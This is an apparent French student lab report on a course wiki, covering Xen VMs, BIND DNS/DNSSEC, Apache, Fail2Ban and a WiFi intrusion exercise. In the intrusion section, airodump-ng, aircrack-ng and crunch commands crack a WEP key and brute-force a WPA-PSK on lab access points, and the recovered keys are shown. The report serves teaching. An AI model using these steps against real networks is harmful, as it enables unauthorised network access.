Ajouter une configuration réseau à nos machines virtuelles est essentiel pour accéder à Internet et pour pouvoir utiliser SSH sur nos machines depuis l'extérieur. C'est ce que nous allons voir dans cette partie.&lt;br /&gt;
&lt;br /&gt;
=== Ping entre les deux machines de services ===&lt;br /&gt;
Comme premier jalon, intéressons nous à la façon de relier nos machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons d'abord modifier les fichiers &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Sur ma machine de services TomPere2 :&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
auto eth0&lt;br /&gt;
	iface eth0 inet static&lt;br /&gt;
		address 192.168.0.3&lt;br /&gt;
		netmask 255.255.255.0&lt;br /&gt;
		gateway 192.168.0.1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;et sur la machine mandataire TomPere0 :&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.0.1&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.168&lt;br /&gt;
    netmask 255.255.255.224&lt;br /&gt;
    gateway 193.48.57.162&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après un &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; puis &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt; pour charger les modifications apportées, cette configuration nous a permis de voir l'adresse IPV4 correspondante à &amp;lt;code&amp;gt;eth0&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;ip address&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
De ce fait, nous avons pu '''ping''' d'une machine à l'autre via le commutateur virtuel.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ping 192.168.0.2&lt;br /&gt;
PING 192.168.0.2 (192.168.0.2) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 192.168.0.2: icmp_seq=1 ttl=64 time=0.236 ms&lt;br /&gt;
64 bytes from 192.168.0.2: icmp_seq=2 ttl=64 time=0.459 ms&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ping 2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
PING 2001:660:4401:60a0:216:3eff:fe4b:1909 (2001:660:4401:60a0:216:3eff:fe4b:1909) 56 data bytes&lt;br /&gt;
64 bytes from 2001:660:4401:60a0:216:3eff:fe4b:1909: icmp_seq=1 ttl=64 time=0.293 ms&lt;br /&gt;
64 bytes from 2001:660:4401:60a0:216:3eff:fe4b:1909: icmp_seq=2 ttl=64 time=0.249 ms&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, alors il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
Pour sécuriser le DNS et avoir un site en HTTPS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt; &amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
notify yes;  // Notification des secondaires&lt;br /&gt;
key-directory &amp;quot;/etc/bind/keys&amp;quot;; //repertoire des keys&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot;; //utilisation d'une politique DNSSEC&lt;br /&gt;
inline-signing yes; //activation de la signature automatique&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
*https://dnschecker.org/&lt;br /&gt;
*https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;small&amp;gt;Remarque : Nous avons également utilisé &amp;lt;code&amp;gt;dig&amp;lt;/code&amp;gt; pour nos tests intermédiaires.&amp;lt;/small&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le premier site, DNSChecker, nous informe si la propagation de notre DNS a eu lieu.&lt;br /&gt;
&lt;br /&gt;
Dans le cas de '''tompere2.xyz''', on voit que c'est bon, aussi bien en IPv4 qu'en IPv6.&lt;br /&gt;
[[Fichier:Déploiement IPv4.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
[[Fichier:Déploiement DNS IPv6.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
Le DNS marche bien ! Super !&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant s'assurer que la partie sécurisée, fonctionne également.&lt;br /&gt;
&lt;br /&gt;
Rendons nous sur '''DNSViz''', un outil qui nous donnera plus d'informations à ce sujet.&lt;br /&gt;
[[Fichier:DNS Viz.png|néant|vignette|Le DNSSEC fonctionne !]]&lt;br /&gt;
Comme on le vois, le DNSSEC fonctionne ! Cela dit, une clé est inutilisée, comme indiqué sur le schéma en gris clair. Nous pouvons la supprimer de '''Gandi,''' pour rendre l'architecture plus cohérente.&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Objectif ===&lt;br /&gt;
L'objectif du serveur Apache sera de pouvoir servir les pages webs de nos machines de services.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install apache2&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Paramètrage sur machine mandataire ====&lt;br /&gt;
Avant de commencer, il nous faut activer quelques modules permettant le bon fonctionnement d'Apache.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod ssl&amp;lt;/code&amp;gt; : active le module SSL pour permettre les connexions sécurisées en '''HTTPS (TLS)''' avec certificats.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy&amp;lt;/code&amp;gt; : active les fonctionnalités de '''reverse proxy''', permettant à Apache de rediriger les requêtes vers un autre serveur.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy_http&amp;lt;/code&amp;gt; : active le support du proxy pour le protocole '''HTTP.'''&lt;br /&gt;
&lt;br /&gt;
Sur la machine mandataire, nous avons créé et rempli le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/000-tompere2.xyz-ssl.conf&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName ns.tompere2.xyz&lt;br /&gt;
    Redirect permanent / https://tompere2.xyz/    &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName tompere2.xyz&lt;br /&gt;
    ServerAlias tompere2.xyz&lt;br /&gt;
    DocumentRoot /var/www/html/&lt;br /&gt;
    CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/tompere2.xyz.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/tompere2.xyz.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/tompere2.xyz.pem&lt;br /&gt;
    SSLVerifyClient None&lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier permet à la machine mandataire de gérer l’accès au site '''tompere2.xyz'''.&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/var/www/html/index.html&amp;lt;/code&amp;gt;, nous avons modifié le titre pour pouvoir visualiser que les changements étaient bien pris en considération.&amp;lt;syntaxhighlight lang=&amp;quot;html&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;title&amp;gt;Tom et Aurele Page: It works&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
Finalement, nous obtenons bien un accès au site '''tompere2.xyz''' avec le nouveau titre ![[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
=== Contexte et objectifs ===&lt;br /&gt;
Les machines '''exposées en SSH''' sur Internet sont constamment ciblées par des '''attaques automatisées''' qui enchaînent des milliers de tentatives de '''connexion par force brute''' afin de deviner des identifiants. Il est donc essentiel de mettre en place un système comme '''Fail2ban pour détecte'''r ces tentatives répétées '''et bloquer''' automatiquement les adresses IP malveillantes.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install fail2ban&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Définition du Fail2Ban ====&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; de la '''machine mandataire''', nous pouvons définir la façon dont le fail2ban va agir.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
ignoreip = 127.0.0.1&lt;br /&gt;
findtime = 10m&lt;br /&gt;
bantime = 5m&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nous sommes protégés contre les tentatives de brute force par SSH. En effet, au bout de 3 échecs consécutifs, l'utilisateur malveillant est banni temporairement.&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12349</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12349"/>
		<updated>2026-02-23T01:13:37Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Machines virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Informations utiles ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Machine&lt;br /&gt;
!Nom&lt;br /&gt;
!Site web&lt;br /&gt;
!IPv4 publique&lt;br /&gt;
|-&lt;br /&gt;
|Ma machine de service&lt;br /&gt;
|TomPere2&lt;br /&gt;
|tompere2.xyz&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine de service d'Aurèle&lt;br /&gt;
|TomPere1&lt;br /&gt;
|tompere.online&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine mandataire&lt;br /&gt;
|TomPere0&lt;br /&gt;
|''NA''&lt;br /&gt;
|193.48.57.168&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
=== Créer ses  VMs ===&lt;br /&gt;
&lt;br /&gt;
==== Prérequis ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous devons nous connecter à ''CapBreton'' pour pouvoir y créer nos machines virtuelles.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
ssh root@capbreton&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ensuite, nous utiliserons l'hyperviseur de machine virtuelle Xen pour créer nos VMs.&lt;br /&gt;
&lt;br /&gt;
==== Création ====&lt;br /&gt;
&lt;br /&gt;
Voici la commande permettant de créer ma machine de service. A noter que l'on était initialiement sur la distribution Excalibur, mais nous avons finalement changé pour Daedalus.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
xen-create-image --hostname=SE4-TomPere2 --dhcp --bridge=pont_pere --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2048M --force&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Maintenant que nous avons une machine virtuelle créer, il faut la démarrer et s'y connecter ! C'est ce que permettent les deux commandes suivantes :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
xen create /etc/xen/SE4-TomPere2.cfg&lt;br /&gt;
xen console SE4-TomPere2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Vérification ====&lt;br /&gt;
Remarque : On peut vérifier que '''les machines virtuelles en cours d’exécution''' grâce à &amp;lt;code&amp;gt;xen list&amp;lt;/code&amp;gt; .&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@capbreton:/var# xen list | grep Tom&lt;br /&gt;
SE4-Tompere1                               389  2048     1     -b----    3574.5&lt;br /&gt;
SE4-Tompere2                               390  2048     1     -b----    3343.2&lt;br /&gt;
SE4-Tompere0                               399  2048     1     -b----    8849.0&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Comme on le voit,  nos 3 machines sont démarrées !&lt;br /&gt;
&lt;br /&gt;
=== Partionnage ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration ====&lt;br /&gt;
On ajoute dans le fichier &amp;lt;code&amp;gt;/etc/xen/SE4-Tompere2.cfg&amp;lt;/code&amp;gt; nos partitions '''home''' et '''var'''.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
    root        = '/dev/xvda2 ro'&lt;br /&gt;
    disk        = [&lt;br /&gt;
                    'file:/usr/local/xen/domains/SE4-Tompere2/disk.img,xvda2,w',&lt;br /&gt;
                    'file:/usr/local/xen/domains/SE4-Tompere2/swap.img,xvda1,w',&lt;br /&gt;
                    'phy:/dev/virtual/Tompere2-home,xvda3,w',&lt;br /&gt;
                    'phy:/dev/virtual/Tompere2-var,xvdb1,w',&lt;br /&gt;
                ]&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Montage des partitions ====&lt;br /&gt;
